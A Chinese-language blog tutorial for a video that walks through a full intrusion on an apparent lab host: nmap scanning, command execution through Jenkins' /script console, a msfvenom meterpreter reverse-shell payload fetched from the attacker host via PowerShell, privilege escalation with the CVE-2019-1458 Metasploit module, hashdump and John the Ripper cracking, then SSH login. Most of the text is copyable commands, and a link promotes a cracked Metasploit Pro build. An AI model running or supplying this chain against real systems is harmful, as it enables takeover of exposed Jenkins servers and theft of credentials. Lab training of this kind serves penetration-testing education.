【视频讲解】Kali Linux入门——如何破解密码

作者:FancyPig | 发布时间: | 更新时间:

相关阅读

上期视频

data-postsbox="{"id":11983,"title":"【视频讲解】渗透测试初学者应掌握的常用技巧和思路","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":3194,"comment_count":8,"category":"knowledge","is_forum_post":false}">{"id":11983,"title":"【视频讲解】渗透测试初学者应掌握的常用技巧和思路","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":3194,"comment_count":8,"category":"knowledge","is_forum_post":false}

破解密码相关内容

之前NetworkChuck带来的hashcat教程

data-postsbox="{"id":5494,"title":"【视频教程】如何高效、优雅地破解密码?hydra、Hashcat你值得拥有!","author":"FancyPig","author_id":1,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2021/12/20211218022439993.png","cover_video":"","views":5287,"comment_count":167,"category":"cybersecurity","is_forum_post":false}">{"id":5494,"title":"【视频教程】如何高效、优雅地破解密码?hydra、Hashcat你值得拥有!","author":"FancyPig","author_id":1,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2021/12/20211218022439993.png","cover_video":"","views":5287,"comment_count":167,"category":"cybersecurity","is_forum_post":false}

猪猪又对hashcat做了补充,教大家如何通过hashcat破解office文档密码

data-postsbox="{"id":6374,"title":"如何使用hashcat破解office文档密码?","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":4404,"comment_count":2,"category":"knowledge","is_forum_post":false}">{"id":6374,"title":"如何使用hashcat破解office文档密码?","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":4404,"comment_count":2,"category":"knowledge","is_forum_post":false}

反弹shell

data-postsbox="{"id":6757,"title":"黑客是如何远程控制一台电脑/服务器的?反弹shell了解一下!","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":5793,"comment_count":7,"category":"cybersecurity","is_forum_post":false}">{"id":6757,"title":"黑客是如何远程控制一台电脑/服务器的?反弹shell了解一下!","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":5793,"comment_count":7,"category":"cybersecurity","is_forum_post":false}

工具与环境准备

data-postsbox="{"id":2210,"title":"Kali linux最新版 安装方法以及常见问题解答","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":6747,"comment_count":28,"category":"cybersecurity","is_forum_post":false}">{"id":2210,"title":"Kali linux最新版 安装方法以及常见问题解答","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":6747,"comment_count":28,"category":"cybersecurity","is_forum_post":false}

你可以使用Kali linux自带的Metasploit渗透框架,也可以在windows上安装(推荐前者)

data-postsbox="{"id":5955,"title":"Metasploit Pro 2022 最新专业激活版/破解版 价值15000$","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":18044,"comment_count":1115,"category":"software","is_forum_post":false}">{"id":5955,"title":"Metasploit Pro 2022 最新专业激活版/破解版 价值15000$","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":18044,"comment_count":1115,"category":"software","is_forum_post":false}

视频讲解

本期视频将以Jenkins脚本执行的漏洞为例,教大家如何在控制台完成反弹shell和权限提升,导出密码散列,最终通过john the ripper完成密码破解

图文讲解

使用Nmap进行信息收集

我们可以尝试对某个网段或者某个IP地址进行扫描

data-postsbox="{"id":194,"title":"如何使用Nmap对某网段进行全端口扫描","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":7264,"comment_count":4,"category":"project","is_forum_post":false}">{"id":194,"title":"如何使用Nmap对某网段进行全端口扫描","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":7264,"comment_count":4,"category":"project","is_forum_post":false}

当然,在不考虑时间和性能的情况下,你也可以简单粗暴的

nmap 192.168.0.110

背景知识:Jenkins

Jenkins是开源CI&CD软件领导者, 提供超过1000个插件来支持构建、部署、自动化, 满足任何项目的需要。

Jenkins是一个开源软件平台

我们访问Jenkins的/script路径

可以看到这里有个脚本调试的地方,可以输入脚本

譬如我们输入

println new ProcessBuilder("cmd.exe","/C whoami").redirectErrorStream(true).start().text

然后我们可以看到返回值是

nt autority\local service

这证明我们的脚本执行成功了,而且返回了windows电脑里cmd上显示的我们现在所处的用户组信息,当然还可以将whoami改为ipconfig,然后我们就可以看到返回的一些网络路由信息。

我们这时可以将上面的实验再继续延伸,我们可以使用metasploit渗透框架

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=4321 -f exe > hackerloix64.exe

我们可以通过Jenkins脚本执行的控制台下载我们刚刚生成的exe文件,看看能不能有新的玩法!

我们通过命令将文件下载下来

然后启动metasploit渗透框架

sudo msfconsole

然后开始监听

use exploit/multi-handler

设置对应的payload

 set payload/windows/x64/meterpreter/reverse_tcp

然后设置好IP和端口

set LHOST 192.168.0.192
set LPORT 4321

最后运行

run

然后在刚才的Jenkins脚本执行的控制台运行,点击Run

  • 下载脚本
println new ProcessBuilder("powershell.exe","Invoke-WebRequest -Uri 'http://192.168.0.192:80/hackerloix64.exe' -Output 'C:\\Program Files\\jenkins\\Scripts\\hackaloix64.exe').redirectErrorStream(true).start().text
  • 利用脚本(如果已经下载可以直接利用
println new ProcessBuilder("hackerloix64.exe").redirectErrorStream(true).start().text

一旦运行,我们在监听器里就可以看到已经连接上windows电脑的cmd了,我们可以输入相关的命令,譬如

getuid
输入getuid来获取用户组信息

当然,你还可以输入

getprivs
输入getprivs获取用户现有的权限

权限提升

我们会发现这里导出密码权限是不足的,因此我们需要进行提权

我们输入下面的命令

session -i 1
ps

看看能不能通过转移来提升权限

migrate 488

发现也不可以

这时我们使用metasploit的提权功能

use post/multi/recon/local_exploit_suggester
set SESSION 1
run -j

发现有可疑利用的漏洞!我们复制下来exploit/windows/local/cve_2019_1458_wizardopium,然后输入下面命令

use exploit/windows/local/cve_2019_1458_wizardopium

输入show options看下,如果没设置IP和端口要设置

set LHOST 192.168.0.192
set LPORT 4444

因为我们之前已经设置了这里就不再设置

然后输入下面的命令

set SESSION 1
run -j

这里看到会话2被打开了

这里输入sessions进行查看,看到权限已经不再是Local了,而是System管理员了

那我们现在就可以导出密码了

use post/windows/gather/hashdump
set SESSION 2
run

密码破解

有了这么多密码之后应该怎么做呢?

我们将上面的密码存储到tobecracked.txt文件里

然后使用john the rapper进行密码破解

john --format=NT ./tobecracked.txt

然后显示破解结果

john --format=NT ./tobecracked.txt --show

我们这里可以看到账户和对应的密码均为vagrant

为了验证账户密码是正确的,我们通过ssh连接192.168.0.110进行测试

ssh vagrant@192.168.0.110

然后在隐藏的位置输入密码(Linux密码输入的时候不会显示****,因此不要以为自己没输入上

最终发现可以成功连接

本期视频到此结束!请记得一定要摒弃弱口令,更换密码强度高一些的密码!

标签:kali, kali linux, metasploit, hashcat, 密码字典, metasploit framework, john, john the rapper, hashcat破解密码, john破解密码感悟, john破解密码太慢了, kali入门, kali教程, kali入门教程, kali入门到入狱, Jenkins, 密码字典生成